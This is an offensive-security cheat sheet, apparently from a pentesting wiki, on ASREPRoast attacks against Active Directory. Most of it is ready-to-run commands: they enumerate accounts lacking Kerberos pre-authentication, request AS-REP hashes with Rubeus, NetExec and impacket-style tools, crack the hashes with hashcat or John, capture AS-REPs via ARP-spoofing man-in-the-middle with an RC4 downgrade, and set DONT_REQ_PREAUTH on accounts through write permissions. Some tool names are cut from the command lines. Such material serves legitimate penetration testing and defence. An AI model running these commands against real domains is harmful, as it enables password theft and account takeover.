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ASREPRoast is a security attack that exploits users who lack the Kerberos pre-authentication required attribute. Essentially, this vulnerability allows attackers to request authentication for a user from the Domain Controller (DC) without needing the user's password. The DC then responds with a message encrypted with the user's password-derived key, which attackers can attempt to crack offline to discover the user's password.

The main requirements for this attack are:

  • Lack of Kerberos pre-authentication: Target users must not have this security feature enabled.
  • Connection to the Domain Controller (DC): Attackers need access to the DC to send requests and receive encrypted messages.
  • Optional domain account: Having a domain account allows attackers to more efficiently identify vulnerable users through LDAP queries. Without such an account, attackers must guess usernames.

Enumerating vulnerable users (need domain credentials) -u user -p 'Password123$!' -d crash.lab --host get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName  
Get-DomainUser -PreauthNotRequired -verbose

Request AS_REP message

# Users list dynamically queried with an LDAP anonymous bind. -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/' 

# With a users file. -usersfile users.txt -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/'

# Users list dynamically queried with a LDAP authenticated bind (password). -request -format hashcat -outputfile ASREProastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'

# Users list dynamically queried with a LDAP authenticated bind (NT hash). -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'

This can also be achieved with NetExec (Python).

nxc ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --KdcHost $KeyDistributionCenter

The kerberoast pure-python toolkit is a good alternative to the tools mentioned above.

The same thing can be done with Rubeus from a session running with a domain user privileges.

Rubeus.exe asreproast  /format:hashcat /outfile:ASREProastables.txt

Depending on the output format used (hashcat or john), hashcat and JohnTheRipper can be used to try cracking the hashes.

hashcat -m 18200 -a 0 ASREProastables.txt $wordlist
john --wordlist=$wordlist ASREProastables.txt

ASREProast MitM

Another way to conduct AS-REP roasting, without relying on Kerberos pre-authentication being disabled, would be to have a man-in-the-middle position on the network and catch AS-REPs. ASRepCatcher (Python) can be used for that purpose. It also has the ability to force client workstations to use RC4 (weaker encryption type) by altering the Kerberos negotiation process. The tool natively uses ARP spoofing (which can be disabled if needed).

# Proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP

# Disables ARP spoofing (the MitM must be obtained with other means)
ASRepCatcher relay -dc $DC_IP --disable-spoofing

# Passively listen for AS-REP packets, no packet alteration
ASRepCatcher listen

Make User ASREPRoastable

Force preauth not required for a user where you have GenericAll permissions (or permissions to write properties): -u user -p 'Password123$!' -d crash.lab --host add uac -f DONT_REQ_PREAUTH
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

